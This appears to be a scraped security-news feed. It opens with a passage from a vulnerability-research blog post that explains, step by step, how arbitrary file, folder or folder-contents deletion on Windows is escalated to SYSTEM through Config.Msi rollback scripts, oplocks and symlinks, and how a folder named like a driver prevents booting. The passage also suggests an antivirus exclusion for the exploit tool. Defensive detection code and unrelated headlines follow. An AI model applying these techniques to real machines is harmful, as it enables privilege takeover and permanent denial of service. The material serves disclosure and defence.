8. The EoP main thread resumes. It repeatedly attempts to create C:\Config.Msi with a weak DACL. As soon as the vulnerable process deletes (or moves, or renames) C:\Config.Msi, the EoP's create operation succeeds.
9. The EoP watches the contents of C:\Config.Msi and waits for Windows Installer to create an .rbs file there.
10. The EoP repeatedly attempts to move C:\Config.Msi elsewhere. As soon as Windows Installer closes its handle to the .rbs, the move succeeds, and the EoP proceeds.
11. The EoP creates C:\Config.Msi one final time. Within it, it places a malicious .rbs file having the same name as the original .rbs. Together with the .rbs, it writes a malicious .rbf.
12. After the delay and the error action specified in the .msi, Windows Installer performs a rollback. It consumes the malicious .rbs and .rbf, dropping the DLL.

Note that at step 7, there is a race condition that sometimes causes problems. If the vulnerable process does not immediately awaken and delete C:\Config.Msi, the window of opportunity may be lost because Windows Installer will soon open a handle to C:\Config.Msi and begin writing an .rbs there. At that point, deleting C:\Config.Msi will no longer work, because it is not an empty folder. To avoid this, it is recommended to run the EoP on a system with a minimum of 4 processor cores. A quiet system, where not much other activity is taking place, is probably ideal. If you do experience a failure, it will be necessary to retry the EoP and trigger the vulnerability a second time.

From Arbitrary File Delete to SYSTEM EoP

The technique described above assumes a primitive that deletes an arbitrary empty folder. Often, though, one has a file delete primitive as opposed to a folder delete primitive. That was the case with Abdelhamid Naceri's User Profile bug. To achieve SYSTEM EoP in this case, his exploit used one additional trick, which we will now explain.

In NTFS, the metadata (index data) associated with a folder is stored in an alternate data stream on that folder. If the folder is named C:\MyFolder, then the index data is found in a stream referred to as C:\MyFolder::$INDEX_ALLOCATION. Some implementation details can be found here. For our purposes, though, what we need to know is this: deleting the ::$INDEX_ALLOCATION stream of a folder effectively deletes the folder from the filesystem, and a stream name, such as C:\MyFolder::$INDEX_ALLOCATION, can be passed to APIs that expect the name of a file, including DeleteFileW. So, if you are able to get a process running as SYSTEM or admin to pass an arbitrary string to DeleteFileW, then you can use it not only as a file delete primitive but also as a folder delete primitive. From there, you can get a SYSTEM EoP using the exploit technique discussed above. In our case, the string you want to pass is C:\Config.Msi::$INDEX_ALLOCATION.

Be advised that success depends on the particular code present in the vulnerable process. If the vulnerable process simply calls DeleteFileA/DeleteFileW, you should be fine. In other cases, though, the privileged process performs other associated actions, such as checking the attributes of the specified file. This is why you cannot test this scenario from the command prompt by running del C:\Config.Msi::$INDEX_ALLOCATION.

From Folder Contents Delete to SYSTEM EoP

Leveling up once more, let us suppose that the vulnerable SYSTEM process does not allow us to specify an arbitrary folder or file to be deleted, but we can get it to delete the contents of an arbitrary folder, or alternatively, to recursively delete files from an attacker-writable folder. Can this also be used for EoP?

Researcher Abdelhamid Naceri demonstrated this as well, in a subsequent submission in July 2021. In this submission he detailed a vulnerability in the SilentCleanup scheduled task, running as SYSTEM. This task iterates over the contents of a temp folder and deletes each file it finds there. His technique was as follows:

1. Create a subfolder, temp\folder1.
2. Create a file, temp\folder1\file1.txt.
3. Set an oplock on temp\folder1\file1.txt.
4. Wait for the vulnerable process to enumerate the contents of temp\folder1 and try to delete the file file1.txt it finds there. This will trigger the oplock.
5. When the oplock triggers, perform the following in the callback:
   a. Move file1.txt elsewhere, so that temp\folder1 is empty and can be deleted. We move file1.txt as opposed to just deleting it because deleting it would require us to first release the oplock. This way, we maintain the oplock so that the vulnerable process continues to wait, while we perform the next step.
   b. Recreate temp\folder1 as a junction to the \RPC Control folder of the object namespace.
   c. Create a symlink at \RPC Control\file1.txt pointing to C:\Config.Msi::$INDEX_ALLOCATION.

When the callback completes, the oplock is released and the vulnerable process continues execution. The delete of file1.txt becomes a delete of C:\Config.Msi.

Readers may recognize the symlink technique involving \RPC Control from James Forshaw's symboliclink-testing-tools. Note, though, that it's not sufficient to set up the junction from temp\folder1 to \RPC Control and then let the arbitrary file delete vulnerability do its thing.
That’s because \RPC Control is not an enumerable file system location, so the vulnerable process would not be able to find \RPC Control\file1.txt via enumeration. Instead, we must start off by creating temp\folder1\file1.txt as a bona fide file, allowing the vulnerable process to find it through enumeration. Only afterward, just as the vulnerable process attempts to open the file for deletion, we turn temp\folder1 into a junction pointing into the object namespace. For working exploit code, see project FolderContentsDeleteToFolderDelete. Note that the built-in malware detection in Windows will flag this process and shut it down. I recommend adding a “Process” exclusion for FolderContentsDeleteToFolderDelete.exe. You can chain these two exploits together. To begin, run FolderOrFileDeleteToSystem and wait for it to prompt you to trigger privileged deletion of Config.Msi. Then, run FolderContentsDeleteToFolderDelete /target C:\Config.Msi. It will prompt you to trigger privileged deletion of the contents of C:\test1. If necessary for your exploit primitive, you can customize this location using the /initial command-line switch. For testing purposes, you can simulate the privileged folder contents deletion primitive by running del /q C:\test1\* from an elevated command prompt. FolderContentsDeleteToFolderDelete will turn this into a delete of C:\Config.Msi, and this will enable FolderOrFileDeleteToSystem to drop the HID.DLL. Finally, open the On-Screen Keyboard and hit Ctrl-Alt-Delete for your SYSTEM shell. From Arbitrary Folder Create to Permanent DoS Before closing, we’d like to share one more technique we learned from this same researcher. Suppose you have an exploit primitive for creating an arbitrary folder as SYSTEM or admin. Unless the folder is created with a weak DACL, it doesn’t sound like this would be something that could have any security impact at all. Surprisingly, though, it does: it can be used for a powerful denial of service. 
The trick is to create a folder such as this one: C:\Windows\System32\cng.sys Normally there is no file or folder by that name. If an attacker name squats on that filesystem location with an extraneous file or even an empty folder, the Windows boot process is disrupted. The exact mechanism is a bit of a mystery. It would appear that Windows attempts to load the cng.sys kernel module from the improper location and fails, and there is no retry logic that allows it to continue and locate the proper driver. The result is a complete inability to boot the system. Other drivers can be used as well for the same effect. Depending on the vulnerability at hand, this DoS exploit could even be a remote DoS, as nothing is required besides the ability to drop a single folder or file. Conclusion The techniques we’ve presented here show how some rather weak exploit primitives can be used for great effect. We have learned that: • An arbitrary folder delete/move/rename (even of an empty folder), as SYSTEM or admin, can be used to escalate to SYSTEM.• An arbitrary file delete, as SYSTEM or admin, can usually be used to escalate to SYSTEM.• A delete of contents of an arbitrary folder, as SYSTEM or admin, can be used to escalate to SYSTEM.• A recursive delete, as SYSTEM or admin, of contents of a fixed but attacker-writable folder (such as a temp folder), can be used to escalate to SYSTEM.• An arbitrary folder create, as SYSTEM or admin, can be used for a permanent system denial-of-service.• An arbitrary file delete or overwrite, as SYSTEM or admin, even if there is no control of contents, can be used for a permanent system denial-of-service. We would like to thank researcher Abdelhamid Naceri for his great work in developing these exploit techniques, as well as for the vulnerabilities he has been reporting to our program. We look forward to seeing more from him in the future. 
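As an added defender-side example, not code from the ZDI post or its exploit projects, the following PowerShell script checks a host for the two on-disk artifacts the post describes: a file or folder name-squatting a driver path directly under System32 (the C:\Windows\System32\cng.sys case, generalized to every driver shipped in System32\drivers), and a C:\Config.Msi whose owner or DACL would let a low-privileged user write rollback scripts into it. The directory layout, the principal lists and the function names are my assumptions.

```powershell
# Added defender-side check; not code from the ZDI post or its exploit projects.
# It looks for two on-disk artifacts the post describes:
#   (1) name squatting on driver paths such as C:\Windows\System32\cng.sys,
#       where the post notes no file normally exists;
#   (2) a C:\Config.Msi folder whose owner or DACL would let a low-privileged
#       principal write rollback scripts into it.
# Assumptions (mine, not the post's): default Windows layout via $env:SystemRoot
# and $env:SystemDrive, and the principal lists below.

$LowPrivilegedPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)
$TrustedOwners = @(
    'NT AUTHORITY\SYSTEM',
    'BUILTIN\Administrators',
    'NT SERVICE\TrustedInstaller'
)

function Find-DriverPathSquats {
    # For each driver shipped under System32\drivers, look for a same-named
    # entry directly under System32. A directory there is the clearest signal,
    # since the loader expects a PE file; a file is reported for review.
    param([string]$System32 = (Join-Path $env:SystemRoot 'System32'))

    $driverDir = Join-Path $System32 'drivers'
    Get-ChildItem -LiteralPath $driverDir -Filter '*.sys' -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            $candidate = Join-Path $System32 $_.Name
            if (Test-Path -LiteralPath $candidate) {
                $item = Get-Item -LiteralPath $candidate -Force
                if ($item.PSIsContainer) {
                    $verdict = 'SQUATTED: directory where a driver file name is expected'
                } else {
                    $verdict = 'REVIEW: file outside drivers\; compare with the copy in drivers\'
                }
                [pscustomobject]@{
                    Path        = $candidate
                    IsDirectory = $item.PSIsContainer
                    CreatedUtc  = $item.CreationTimeUtc
                    Owner       = (Get-Acl -LiteralPath $candidate).Owner
                    Verdict     = $verdict
                }
            }
        }
}

function Test-ConfigMsiDacl {
    # The post's EoP recreates C:\Config.Msi from a low-privileged process with
    # a weak DACL. Report the owner and any Allow ACE that grants write-type
    # rights to one of the low-privileged principals above.
    param([string]$Path = (Join-Path $env:SystemDrive 'Config.Msi'))

    if (-not (Test-Path -LiteralPath $Path)) {
        return [pscustomobject]@{ Path = $Path; Present = $false; OwnerSuspect = $false; WeakAces = @() }
    }

    $rights    = [System.Security.AccessControl.FileSystemRights]
    $writeMask = [int]($rights::Write -bor $rights::Delete -bor
                       $rights::ChangePermissions -bor $rights::TakeOwnership)

    $acl  = Get-Acl -LiteralPath $Path
    $weak = @($acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $LowPrivilegedPrincipals -contains $_.IdentityReference.Value -and
        (([int]$_.FileSystemRights) -band $writeMask) -ne 0
    })

    [pscustomobject]@{
        Path         = $Path
        Present      = $true
        Owner        = $acl.Owner
        OwnerSuspect = ($TrustedOwners -notcontains $acl.Owner)
        WeakAces     = @($weak | ForEach-Object { '{0}: {1}' -f $_.IdentityReference.Value, $_.FileSystemRights })
    }
}

# Read-only; run from an elevated PowerShell so every DACL can be read.
Find-DriverPathSquats | Format-Table -AutoSize
Test-ConfigMsiDacl    | Format-List
```

A non-empty result from Find-DriverPathSquats on a machine that still boots is the moment to investigate, since the post notes that once the squat is in place the next boot fails.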
Until then, you can find me on Twitter at @HexKitchen, and follow the team for the latest in exploit techniques and security patches.
by Zero Day Initiative Blog
2024-09-03 15:45:49
Sextortion Scams Now Include Photos of Your Home
An old but persistent email scam known as "sextortion" has a new personalized touch: The missives, which claim that malware has captured webcam footage of recipients pleasuring themselves, now include a photo of the target's home in a bid to make threats about publishing the videos more frightening and convincing.
by Krebs on Security
2024-09-03 15:44:01
CERT-In Advisory and WikiLoader Campaign: Comprehensive Overview of Recent Security Threats
CERT-In's advisory on Palo Alto Networks vulnerabilities and WikiLoader's fake GlobalProtect installers highlight major security risks.

Key Takeaways

• CERT-In has issued a critical advisory highlighting vulnerabilities in multiple Palo Alto Networks applications, including GlobalProtect, Cloud NGFW, PAN-OS, and Cortex XSOAR.
• Concurrently, new malware distribution methods involving WikiLoader have been detected, leveraging spoofed GlobalProtect installers.
• The vulnerabilities identified include privilege escalation (CVE-2024-5915), information disclosure (CVE-2024-5916), and command injection (CVE-2024-5914).
• WikiLoader, a sophisticated loader, uses advanced evasion techniques such as SEO poisoning to distribute its payload.
• Specific versions of affected software and newly observed malware tactics require immediate attention. Timely updates and robust defense mechanisms are critical for mitigating these risks.
• Recommended actions include upgrading affected software, restricting access, using threat detection tools, and staying vigilant against sophisticated malware campaigns like WikiLoader.

Overview

CERT-In's recent advisory and the emergence of WikiLoader malware highlight pressing security concerns involving Palo Alto Networks applications and new malware distribution techniques. CERT-In has pinpointed critical vulnerabilities in GlobalProtect, Cloud NGFW, PAN-OS, and Cortex XSOAR. These vulnerabilities range from privilege escalation and information disclosure to command injection. In parallel, the WikiLoader campaign, which uses fake GlobalProtect installers for malware distribution, illustrates the increasing sophistication of cyber threats.

The vulnerabilities span multiple Palo Alto Networks applications, each with varying degrees of impact and risk. The GlobalProtect app for Windows, a widely used tool for secure remote access, is affected across several versions. Specifically, versions 6.3 < 6.3.1, 6.2 < 6.2.4, 6.1 < 6.1.5, 6.0 < 6.0.x, and 5.1 < 5.1.x are impacted.

Detailed Description of Vulnerabilities and Malware Campaign

1. Privilege Escalation Vulnerability (CVE-2024-5915)

CVE-2024-5915 is a local privilege escalation vulnerability found in the GlobalProtect app for Windows. This issue arises from an unspecified error that allows a local user to execute programs with elevated privileges, potentially compromising the entire system. The flaw can enable an attacker who already has local access to gain administrative control over the system, leading to a high risk of system-wide compromise.

The vulnerability is rated as MEDIUM, with a CVSSv4.0 Base Score of 5.2. The attack vector is local, which means that the attacker needs physical or remote desktop access to exploit the flaw. The attack complexity is low, indicating that exploiting the vulnerability does not require sophisticated techniques. The impact can be significant, leading to potential breaches of confidentiality, integrity, and availability.

The vulnerability impacts GlobalProtect App versions 6.3 < 6.3.1, 6.2 < 6.2.4, 6.1 < 6.1.5, 6.0 < 6.0.x, and 5.1 < 5.1.x. Patches and updates are planned, with updates expected by August 2024 for version 6.3.1, November 2024 for 6.0.x, and December 2024 for 5.1.x. Until updates are applied, restricting access to GlobalProtect installation directories and ensuring they are protected from non-administrative modifications is recommended.

2. Information Disclosure Vulnerability (CVE-2024-5916)

CVE-2024-5916 is an information disclosure vulnerability affecting PAN-OS and Cloud NGFW. This flaw involves the exposure of sensitive information, such as secrets, passwords, and tokens of external systems, through configuration logs. A read-only administrator with access to these logs could view sensitive data, leading to potential unauthorized access to critical systems.

This vulnerability is rated as MEDIUM, with a CVSSv4.0 Base Score of 6.0. The attack vector is network-based, meaning that an attacker can exploit the flaw remotely. The attack complexity is low, and no user interaction is required, making the vulnerability particularly concerning. The primary impact is on confidentiality, though integrity and availability are not directly affected.

PAN-OS versions 11.0 < 11.0.4, 10.2 < 10.2.8, and Cloud NGFW versions prior to August 15 on Azure and August 23 on AWS are affected. Organizations should upgrade to PAN-OS 11.0.4, 10.2.8, or later versions and ensure Cloud NGFW is updated to versions released on or after the specified dates. It is also crucial to revoke any compromised credentials to prevent unauthorized access.

3. Command Injection Vulnerability (CVE-2024-5914)

CVE-2024-5914 is a command injection vulnerability found in the Cortex XSOAR CommonScripts pack. This issue allows unauthenticated attackers to execute arbitrary commands within the context of an integration container. Command injection vulnerabilities are particularly dangerous as they can be exploited to execute arbitrary commands, potentially leading to severe security breaches.

The vulnerability has a HIGH severity rating, with a CVSSv4.0 Base Score of 7.0. The attack vector is network-based, and while the attack complexity is high, the lack of required user interaction makes it a significant threat. The impact includes substantial risks to confidentiality and integrity, with a potential low impact on availability.

The vulnerability affects versions of the Cortex XSOAR CommonScripts pack before 1.12.33. To address the issue, upgrade to version 1.12.33 or later. Additionally, removing any integration usage of the ScheduleGenericPolling or GenericPollingScheduledTask scripts can help prevent exploitation.

The WikiLoader Malware Campaign

WikiLoader is a sophisticated loader that has been observed using advanced evasion techniques to distribute malware. The loader leverages SEO poisoning and fake GlobalProtect installers to deliver its payload. This method involves spoofing legitimate software installers, which increases the likelihood of successful malware delivery.

Attackers have utilized SEO poisoning techniques to direct users to spoofed sites, such as bitbucket[.]org, where fake GlobalProtect installers containing WikiLoader components are hosted. This technique capitalizes on the high trust placed in legitimate software sources to trick users into downloading malicious payloads.

Upon infection, WikiLoader downloads and extracts additional components, executes them, and uses legitimate binaries for side-loading. The malware creates persistence on the system through randomized file names and employs various obfuscation methods to avoid detection. WikiLoader includes several anti-analysis measures, such as detecting virtual machine environments to evade sandbox analysis, displaying misleading error messages, and employing obfuscation through randomized folder names. These techniques are designed to hinder detection and analysis by security tools.

Recommendations and Mitigations

To effectively address the identified vulnerabilities and new malware threats, organizations should implement the following measures:

• To address the vulnerabilities, apply the latest patches and updates for GlobalProtect, PAN-OS, Cloud NGFW, and Cortex XSOAR. Check for updates regularly and apply them promptly.
• Limit access to GlobalProtect installation directories and ensure that sensitive credentials in PAN-OS are protected. Revoke any compromised credentials and review access controls to prevent unauthorized access.
• Implement and configure threat detection tools to monitor for unusual activity and signs of infection. Utilize XQL queries to identify indicators of WikiLoader and other malware behaviors.
• Provide staff with training and awareness programs on emerging threats and security best practices. Ensure that employees are informed about the risks of downloading software from untrusted sources and the importance of verifying software integrity.
• Conduct regular vulnerability assessments and scans to identify and address potential security weaknesses. Ensure that all updates and patches are applied in a timely manner.

Conclusion

The recent CERT-In advisory and the emergence of the WikiLoader malware campaign highlight critical vulnerabilities and evolving cyber threats. The identified vulnerabilities in Palo Alto Networks applications and the sophisticated tactics employed by WikiLoader underscore the need for proactive security measures. By addressing the vulnerabilities through timely updates, restricting access, and employing robust defense mechanisms, organizations can significantly reduce the risk of exploitation. Additionally, staying alert against sophisticated malware campaigns and continuously improving security practices are essential for protecting systems and sensitive data. Implementing the recommended actions will help to protect against these risks and enhance the overall security posture.
by CYBLE
2024-09-03 15:11:59
City of Columbus tries to silence security researcher
The City of Columbus filed a lawsuit against a researcher for trying to inform the public about the nature of data stolen by a ransomware group.
by Malwarebytes Labs
2024-09-03 15:07:00
Rocinante Trojan Poses as Banking Apps to Steal Sensitive Data from Brazilian Android Users
Mobile users in Brazil are the target of a new malware campaign that delivers a new Android banking trojan named Rocinante. "This malware family is capable of performing keylogging using the Accessibility Service, and is also able to steal PII from its victims using phishing screens posing as different banks," Dutch security company ThreatFabric said. "Finally, it can use all this exfiltrated
by The Hacker News
2024-09-03 14:52:12
Introducing the URL validation bypass cheat sheet
URL validation bypasses are the root cause of numerous vulnerabilities including many instances of SSRF, CORS misconfiguration, and open redirection. These work by using ambiguous URLs to trigger URL
by PortSwigger Research
2024-09-03 14:50:02
How to export notes from Notion and make an offline backup of your data | Kaspersky official blog
A step-by-step guide to backing up Notion notes, and migrating them to free rival apps Obsidian or AFFiNE.
by Kaspersky
2024-09-03 14:19:43
BlackCat Spin-off 'Cicada3301' Uses Stolen Creds on the Fly, Skirts EDR
Malware authors have iterated on one of the premier encryptors on the market, building something even bigger and better.
by Dark Reading
2024-09-03 14:00:00
Improved Software Supply Chain Resilience Equals Increased Security
Understanding through visibility, managing through governance, and anticipating through continuous deployment will better prepare organizations for the next supply chain attack.
by Dark Reading
2024-09-03 13:50:53
September is Preparedness Month
For Preparedness Month in September, Keeper Security, a provider of zero-trust and zero-knowledge cybersecurity software, has urged businesses to prepare for the rising tide of cyber threats by prioritising fundamental cybersecurity practices. With more sensitive data being stored online, the risk of breaches and exploitation is at an all-time high. To defend against the most […]
by IT Security Guru
2024-09-03 13:38:00
CVE-2024-27198 explained (TeamCity Auth Bypass)
We deep dive into CVE-2024-27198, also known as the JetBrains TeamCity Multiple Authentication Bypass.
by Hack The Box Blog
2024-09-03 13:36:30
The waterproof Blink Mini 2 security camera is the best Wyze Cam alternative available
The newest version of the Blink Mini features key improvements that make it worthy even for non-budget shoppers.
by ZDNET Security
2024-09-03 13:00:00
Cost of a data breach: Cost savings with law enforcement involvement
For those working in the information security and cybersecurity industries, the technical impacts of a data breach are generally understood. But for those outside of these technical functions, such as executives, operators and business support functions, “explaining” the real impact of a breach can be difficult. Therefore, explaining impacts in terms of quantifiable financial figures […]
by Security Intelligence
2024-09-03 13:00:00
Secrets Exposed: Why Your CISO Should Worry About Slack
In the digital realm, secrets (API keys, private keys, username and password combos, etc.) are the keys to the kingdom. But what if those keys were accidentally left out in the open in the very tools we use to collaborate every day? A Single Secret Can Wreak Havoc Imagine this: It's a typical Tuesday in June 2024. Your dev team is knee-deep in sprints, Jira tickets are flying, and Slack is
by The Hacker News
2024-09-03 12:46:06
Halliburton confirms data was stolen in ongoing cyberattack
The oil and fracking giant says it is "working to identify effects" of the ongoing cyberattack on its oil and fracking operations.
by TechCrunch
2024-09-03 12:33:45
Name That Edge Toon: Bug Off
Feeling creative? Submit your caption and our panel of experts will reward the winner with a $25 Amazon gift card.
by Dark Reading
2024-09-03 12:24:27
Check Point Software Launches New MSSP Portal for Partners: Streamlining Service Delivery and Business Operations
Check Point® Software Technologies Ltd. today introduced its cutting-edge Portal tailored for managed security service providers (MSSPs) and distributors. This innovative platform streamlines service delivery and simplifies the business experience with Check Point. As highlighted by Canalys, the global MSSP market is expected to expand at an annual rate of 14.2%, fueled by rising cyber […]
by IT Security Guru
2024-09-03 12:21:00
Russian Disinformation Campaign “DoppelGänger” Unmasked: A Web of Deception
The European Union’s Disinformation Lab (EU DisinfoLab) has recently exposed a sophisticated Russian influence campaign known as “DoppelGänger.”
by U.S. Cyber Command News
2024-09-03 12:00:25
Threat actors using MacroPack to deploy Brute Ratel, Havoc and PhantomCore payloads
The threat of VBA macros has diminished since Microsoft prevented the execution of macros in Microsoft Office documents downloaded from the internet, but not all users are using the latest up-to-date Office versions and can still be vulnerable.
by Cisco Talos Blog
2024-09-03 12:00:00
Your KnowBe4 Compliance Plus Fresh Content Updates from August 2024
Check out the August updates in Compliance Plus so you can stay on top of featured compliance training content.
by KnowBe4
2024-09-03 11:45:03
Why Every IT Leader Needs a Team of Trusted Advisors
Sooner or later, every IT leader runs into a virtual brick wall. That's when it's helpful to have some trusted colleagues to turn to for advice and support.
by ITPro Today
2024-09-03 11:26:52
Building an Accessible Future in the Private Sector
Private companies must prioritize digital inclusivity to enhance user experience, protect their reputation, and tap into a broader customer base.
by ITPro Today
2024-09-03 11:07:17
Crushing FUD: Embracing Ethical Hackers to Strengthen CybersecurityCrushing FUD: Embracing Ethical Hackers to Strengthen Cybersecurity Antoine Willia… Tue, 09/03/2024 - 07:58 Body What is FUD?Fear, Uncertainty, and Doubt (FUD), are central blockers to high-efficacy security programs by creating a climate of fear and hesitation, which impedes effective decision-making and proactive measures. The primary goal of FUD is to create anxiety and distrust, which can lead to paralysis in security operations and a defensive rather than a proactive mindset.Examples of FUDHackers Using Reports as Leverage: Companies may worry that hackers will make sensitive security reports public without consent, potentially exposing vulnerabilities before they can be mitigated. Cybercriminals may threaten to release or withhold critical security findings unless a ransom is paid, leveraging fear to coerce companies into compliance.Knocking Assets Offline: The fear of attackers taking critical assets offline or causing general product disruption can paralyze decision-making and lead to overly conservative security practices.Seeing Hackers as Criminals: The stereotype of hackers as solely malicious actors creates fear and mistrust, hindering collaboration with ethical hackers and security researchers.Lack of Trust: General distrust within the security community, whether towards software vendors, security solutions, or even internal teams, exacerbates uncertainty and hinders cooperation.Being Overwhelmed with New Vulnerabilities: The rapid influx of new vulnerabilities can overwhelm security teams without a proper triage, escalation, and remediation process, leading to a sense of helplessness.Exceeding Engineering Capacity to Remediate Vulnerabilities: When the volume of vulnerabilities outpaces the ability of engineering teams to address them, it can create fear of inevitable breaches and system failures.Brand Damage: The fear that any security incident, no matter how minor, will cause 
irreparable damage to a company’s reputation can lead to excessive risk aversion.Legal Ramifications: Concerns about the legal consequences of breaches, including fines and regulatory actions, can cause a team to create more roadblocks for ethical hackers during testing.Why FUD is Hindering Security Programs FUD significantly hinders cybersecurity programs by creating a paralyzing environment where decision-makers become overly cautious, leading to delays in implementing necessary security measures. This fear-driven inaction leaves organizations vulnerable to preventable attacks. Additionally, FUD often results in the misallocation of resources, as companies may invest heavily in less effective security measures out of fear, diverting critical resources away from more impactful solutions. The pervasive sense of fear and uncertainty erodes trust within the organization and with external partners, hampering collaboration and information sharing that are essential for effective cybersecurity.Moreover, the constant pressure of dealing with FUD can lead to burnout and low morale among security professionals, decreasing overall productivity and effectiveness. This environment stifles innovation, as fear of potential vulnerabilities in new technologies can lead to resistance against adopting innovative solutions, leaving organizations behind in security advancements. Ultimately, FUD fosters a reactive rather than proactive security posture, where organizations respond to threats as they arise instead of preparing for and mitigating potential risks. To overcome these challenges, it is crucial to cultivate a culture of trust, transparency, and collaboration, replacing FUD with informed, strategic decision-making to enhance the overall security posture.Combatting FUD: The HackerOne Journey HackerOne’s solution effectively crushes FUD by guiding customers through a comprehensive security journey. 
It begins with penetration testing (pentest) to identify and report initial vulnerabilities, providing a clear understanding of potential threats. Following this, we implement a Vulnerability Disclosure Program (VDP), which serves as a public channel for ethical hackers to submit bugs, ensuring continuous monitoring and improvement. The journey then progresses to a private Bug Bounty Program, incentivizing ethical hackers to uncover more critical and impactful vulnerabilities within your product. This holistic approach not only enhances your security posture but also addresses and mitigates common sources of customer FUD by fostering transparency, collaboration, and proactive risk management.Researching Crowd-Sourced Vulnerability TestingWhat is a VDP and a BBP?VDP (Vulnerability Disclosure Program): A VDP is a public intake process intended to give ethical hackers directions on how and where to report a vulnerability in an organization’s systems. It ensures that vulnerabilities are identified and mitigated before they can be exploited. VDPs are often called the “see something, say something” safey net of the internet. BBP (Bug Bounty Program): A BBP is similar to a VDP but offers monetary rewards to ethical hackers who identify and report security flaws in an organization’s digital assets. This incentivizes more thorough testing and timely disclosure of vulnerabilities. BBPs have the option to be private or public, where you can choose which will work best for you.What is Hacker-Powered Testing?Hacker-powered testing leverages a global community of skilled security researchers to identify vulnerabilities in organizations’ systems. 
By tapping into the collective expertise of ethical hackers, organizations can uncover security flaws that might go unnoticed by traditional security assessments.Why Add Crowd-Sourced Testing to Your Security Posture?Broader Coverage: Access a diverse pool of researchers with varied expertise.Continuous Improvement: Ongoing testing and feedback help maintain a robust security posture.Cost-Effective: Pay for valid vulnerability reports, reducing overall security costs.Enhanced Innovation: Leverage innovative approaches from the hacker community to discover unique vulnerabilities.Getting Organizational Buy-in for Bug Bounty and VDPBefore diving into crowd-sourced testing, it’s crucial to get buy-in from key stakeholders within your organization:TeamMethod of SocializationEngineeringHighlight the benefits of receiving detailed, actionable reports from skilled hackers, which can streamline the remediation process.LeadershipEmphasize the strategic advantages, such as meeting compliance requirements and showcasing a proactive security stance to stakeholders.Security TeamDiscuss how crowd-sourced testing complements existing security measures, providing an additional layer of defense.Starting with a Hacker-Powered PentestKick off your journey with a Hacker-Powered Pentest:Clear Compliance Needs: Ensure your organization meets regulatory requirements by identifying and mitigating vulnerabilities.Dip Your Feet into Ethical Hacking: Gain firsthand experience working with ethical hackers in a controlled environment.Report to Leadership: Share the positive results and insights gained from the pentest to build support for further testing.Make the Case for Additional Testing: Use the success of the initial pentest to advocate for more extensive crowd-sourced testing programs.Building Up to a Public VDPOnce you’ve established initial trust and familiarity with the hacker community, transition to a Public VDP:General Attack Surface Coverage: Broaden the scope of testing to include 
all publicly accessible assets.Responsible Disclosure: Provide a formal channel for hackers to report vulnerabilities responsibly.Community Interaction: Learn to engage with the hacker community and address their findings effectively.Cost-Effective Discovery: Identify low-hanging fruit at a lower cost than traditional methods.Running a HackerOne ChallengeIn parallel, run a HackerOne Challenge to stress-test specific assets:Targeted Testing: Focus on a particular asset or feature during a time-bound event.Security Maturity Assessment: Evaluate the security readiness of assets before wider testing.Cost Reduction: Identify and fix vulnerabilities pre-deployment, reducing overall bounty payments.Build Familiarity: Develop rapport with a group of hackers and learn best practices for running a successful program.Initiating a Private Ongoing Bug Bounty ProgramTransition to a Private Bug Bounty Program for continuous coverage:Ongoing Monitoring: Maintain regular security assessments of your assets.Flexibility: Adapt the scope of testing based on evolving security needs.Incentivized Testing: Engage a curated group of hackers to continuously probe for vulnerabilities.Growing to a Public Bug Bounty ProgramFinally, scale up to a Public Bug Bounty Program to maximize coverage:Widest Coverage: Engage the global hacker community for the broadest possible testing.Continuous Improvement: Benefit from ongoing insights and vulnerability reports.Enhanced Reputation: Demonstrate a strong commitment to security by collaborating openly with ethical hackers.HackerOne Is the Ultimate Solution to Dismantle FUDBy methodically leveraging HackerOne’s products, organizations can systematically dismantle Fear, Uncertainty, and Doubt associated with ethical hacking. Embrace crowd-sourced testing, build internal support, and scale your security efforts to create a robust, proactive defense against cyber threats. Together, we can create a safer digital world. 
To learn more, contact the expert team at HackerOne today.
by HackerOne
2024-09-03 11:07:15
Taiwan Accuses China of 'Poaching' Talent From Its Tech Firms
Taiwan alleges that Chinese companies are illegally recruiting talent and stealing trade secrets.
by ITPro Today
2024-09-03 11:00:24
A deep dive into the most interesting incident response cases of last year
Kaspersky Global Emergency Response Team (GERT) shares the most interesting IR cases for the year 2023: insider attacks, ToddyCat-like APT, Flax Typhoon and more.
by Securelist
2024-09-03 11:00:00
The US Navy Is Going All In on Starlink
The Navy is testing out the Elon Musk–owned satellite constellation to provide high-speed internet access to sailors at sea. It's part of a bigger project that's about more than just getting online.
by WIRED Security News
2024-09-03 10:52:58
Halliburton confirms data stolen in August cyberattack
The company continues to incur expenses related to the attack, but does not expect a material impact.
by Cybersecurity Dive
2024-09-03 10:23:50
Iran-linked actors ramping up cyberattacks on US critical infrastructure
Nation-state attackers are exploiting vulnerabilities in products from Check Point Software, Palo Alto Networks and others to attack multiple industries.
by Cybersecurity Dive
2024-09-03 09:57:44
Simone Biles & Cyber Burnout: A Shared Path to Resilience
This year's Olympic and Paralympic Games have been a showcase of the benefits of preparedness, tenacity, and adaptability in achieving success. Olympians require all of these traits, and more, to operate at the very top of their respective disciplines. However, the psychological impact of going for gold, and carrying the expectations of fans nationwide, can […]
by IT Security Guru
2024-09-03 09:45:00
Migrating From VMware: Guide to a Successful Transition
No matter your reason for transitioning from VMware, this comprehensive guide details the key migration processes and tools to consider when moving to an alternative platform.
by ITPro Today
2024-09-03 09:40:26
INSIDER THREAT AWARENESS MONTH: Are you prepared?
An insider threat can feel a bit like the plot twist in a spy thriller. You know, the moment when the protagonist realises the enemy is not just at the gates but has been inside the house the whole time. Suddenly, all those polite conversations by the water cooler take on a sinister meaning. So, […]
by IT Security Guru
2024-09-03 09:38:54
The six most dangerous new threats security teams need to know about
The rise of AI presents both extraordinary opportunities and intimidating challenges in cybersecurity. While AI can easily identify and exploit vulnerabilities, deploying it without robust security measures introduces significant risks. As the technology evolves, many organisations prioritise AI innovation at the expense of security, leaving their systems vulnerable. This underscores the need for established security […]
by IT Security Guru
2024-09-03 09:31:00
New Flaws in Microsoft macOS Apps Could Allow Hackers to Gain Unrestricted Access
Eight vulnerabilities have been uncovered in Microsoft applications for macOS that an adversary could exploit to gain elevated privileges or access sensitive data by circumventing the operating system's permissions-based model, which revolves around the Transparency, Consent, and Control (TCC) framework. "If successful, the adversary could gain any privileges already granted to the affected
by The Hacker News
2024-09-03 08:00:47
IT threat evolution in Q2 2024. Non-mobile statistics
